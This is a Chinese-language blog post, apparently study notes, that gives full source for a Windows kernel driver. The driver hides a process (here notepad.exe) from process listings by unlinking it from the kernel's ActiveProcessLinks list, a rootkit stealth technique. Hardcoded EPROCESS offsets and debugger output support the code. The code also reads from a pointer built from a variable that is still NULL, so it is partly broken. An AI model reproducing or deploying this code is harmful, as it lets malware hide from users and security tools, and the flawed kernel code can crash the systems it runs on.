zoukankan      html  css  js  c++  java
  • ring0 进程隐藏实现

    最近在学习内核编程,记录一下最近的学习笔记。

    原理:将当前进程从eprocess结构的链表中删除

    无法被! process 0 0 看见 

    #include "HideProcess.h"
    
    #ifdef WIN64
    
    #define ACTIVEPROCESSLINKS_EPROCESS  0x188
    #define IMAGEFILENAME_EPROCESS       0x2e0    //16个字节组成的单字数组
    #else
    
    #define ACTIVEPROCESSLINKS_EPROCESS  0x088
    #define IMAGEFILENAME_EPROCESS       0x174    //16个字节组成的单字数组
    
    #endif
    
    NTSTATUS
        DriverEntry(PDRIVER_OBJECT  DriverObject,PUNICODE_STRING  RegisterPath)
    {
        PDEVICE_OBJECT  DeviceObject;
        NTSTATUS        Status;
        int             i = 0;
    
        UNICODE_STRING  DeviceName;
        UNICODE_STRING  LinkName;
    
        RtlInitUnicodeString(&DeviceName,DEVICE_NAME);
        RtlInitUnicodeString(&LinkName,LINK_NAME);
    
        //创建设备对象;
    
        Status = IoCreateDevice(DriverObject,0,
        &DeviceName,FILE_DEVICE_UNKNOWN,0,FALSE,&DeviceObject);
        if (!NT_SUCCESS(Status))
        {
            return Status;
        }
    
        Status = IoCreateSymbolicLink(&LinkName,&DeviceName);
    
        for (i = 0; i<IRP_MJ_MAXIMUM_FUNCTION; i++)
        {
            DriverObject->MajorFunction[i] = DefaultPassThrough;
        }
    
        DriverObject->DriverUnload = UnloadDriver;
    
        if (HideProcess("notepad.exe") == FALSE)
        {
            DbgPrint("No Exist
    ");
        }
    
    
    #ifdef WIN64
    
        DbgPrint("WIN64: HideProcess IS RUNNING!!!");
    #else
    
        DbgPrint("WIN32: HideProcess SIS RUNNING!!!");
    
    #endif
        
        return STATUS_SUCCESS;
    }
    
    NTSTATUS
        DefaultPassThrough(PDEVICE_OBJECT  DeviceObject,PIRP Irp)
    {
        Irp->IoStatus.Status = STATUS_SUCCESS;
        Irp->IoStatus.Information = 0;
        IoCompleteRequest(Irp,IO_NO_INCREMENT);
    
        return STATUS_SUCCESS;
    }
    
    VOID
        UnloadDriver(PDRIVER_OBJECT DriverObject)
    {
        UNICODE_STRING  LinkName;
        PDEVICE_OBJECT    NextDeviceObject    = NULL;
        PDEVICE_OBJECT  CurrentDeviceObject = NULL;
        RtlInitUnicodeString(&LinkName,LINK_NAME);
    
        IoDeleteSymbolicLink(&LinkName);
        CurrentDeviceObject = DriverObject->DeviceObject;
        while (CurrentDeviceObject != NULL) 
        {
        
            NextDeviceObject = CurrentDeviceObject->NextDevice;
            IoDeleteDevice(CurrentDeviceObject);
            CurrentDeviceObject = NextDeviceObject;
        }
    
    
        
        DbgPrint("HideProcess IS STOPPED!!!");
    }
    
    BOOLEAN HideProcess(char* ProcessImageName)
    {
        //通过进程EProcess (ObjectHeader ObjectBody)
        /*
        kd> !process 0 0
        PROCESS fffffa8031ec9060
        SessionId: 1  Cid: 073c    Peb: 7fffffdf000  ParentCid: 06f8
        DirBase: 7fb21000  ObjectTable: fffff8a001ea3600  HandleCount: 545.
        Image: explorer.exe
        kd> dt _eprocess fffffa8031ec9060
        +0x000 Pcb              : _KPROCESS
        +0x160 ProcessLock      : _EX_PUSH_LOCK
        +0x168 CreateTime       : _LARGE_INTEGER 0x01d29b23`d17ef664
        +0x170 ExitTime         : _LARGE_INTEGER 0x0
        +0x178 RundownProtect   : _EX_RUNDOWN_REF
        +0x180 UniqueProcessId  : 0x00000000`0000073c Void
        +0x188 ActiveProcessLinks : _LIST_ENTRY [ 0xfffffa80`31aeb1e8 - 0xfffffa80`3265da98 ]
        +0x198 ProcessQuotaUsage : [2] 0x3dc8
        kd> dt _LIST_ENTRY
        nt!_LIST_ENTRY
        +0x000 Flink            : Ptr64 _LIST_ENTRY    Next ListEntry
        +0x008 Blink            : Ptr64 _LIST_ENTRY    Previous
    
        kd> dt _eprocess 0xfffffa80`31aeb1e8-0x188
        nt!_EPROCESS
        +0x000 Pcb              : _KPROCESS
        +0x188 ActiveProcessLinks : _LIST_ENTRY [ 0xfffffa80`31ec84d8 - 0xfffffa80`31ec91e8 ]
        +0x2e0 ImageFileName    : [15]  "vmtoolsd.exe"
    
        [空头][System][][][][Explorer][vmtoolsd]
        */
        PLIST_ENTRY  ListEntry = NULL;
        PEPROCESS  EProcess = NULL;
        PEPROCESS  v1 = NULL;
        PEPROCESS  EmptyEProcess = NULL;
        char*      ImageFileName = NULL;
        EProcess = PsGetCurrentProcess();
        if (EProcess == NULL)
        {
            return FALSE;
        }
        ImageFileName = (char*)((UINT8*)v1 + IMAGEFILENAME_EPROCESS);
        DbgPrint("CurrentImageFileName:%s
    ", ImageFileName);
        v1 = EProcess;   //System.exe  EProcess
        //System.exe  的前一个 实际上是一个空头节点
        ListEntry = (PLIST_ENTRY)((UINT8*)EProcess + ACTIVEPROCESSLINKS_EPROCESS);  //0x188
        EmptyEProcess = (PEPROCESS)(((ULONG_PTR)(ListEntry->Blink)) - ACTIVEPROCESSLINKS_EPROCESS);
    
        ListEntry = NULL;
        while (v1 != EmptyEProcess)  //System!=空头节点
        {
            ImageFileName = (char*)((UINT8*)v1 + IMAGEFILENAME_EPROCESS);   //System.exe   Calc.exe
            //DbgPrint("ImageFileName:%s
    ",szImageFileName);   
            ListEntry = (PLIST_ENTRY)((ULONG_PTR)v1 + ACTIVEPROCESSLINKS_EPROCESS);
            if (strstr(ImageFileName, ProcessImageName) != NULL)
            {
                if (ListEntry != NULL)
                {
                    RemoveEntryList(ListEntry);
                    break;
                }
            }
            v1 = (PEPROCESS)(((ULONG_PTR)(ListEntry->Flink)) - ACTIVEPROCESSLINKS_EPROCESS);  //Calc
        }
        return TRUE;
    }
  • 相关阅读:
    window.location.href的使用方法
    hdu 2850 Load Balancing (优先队列 + 贪心)
    几种常见模式识别算法整理和总结
    【DateStructure】 Charnming usages of Map collection in Java
    编写你自己的单点登录(SSO)服务
    微软历史最高市值是多少?
    Tomcat配置一个ip绑定多个域名
    递归算法:求序列的全排列
    SMTP协议分析
    platform_device与platform_driver
  • 原文地址:https://www.cnblogs.com/HsinTsao/p/7427700.html
Copyright © 2011-2022 走看看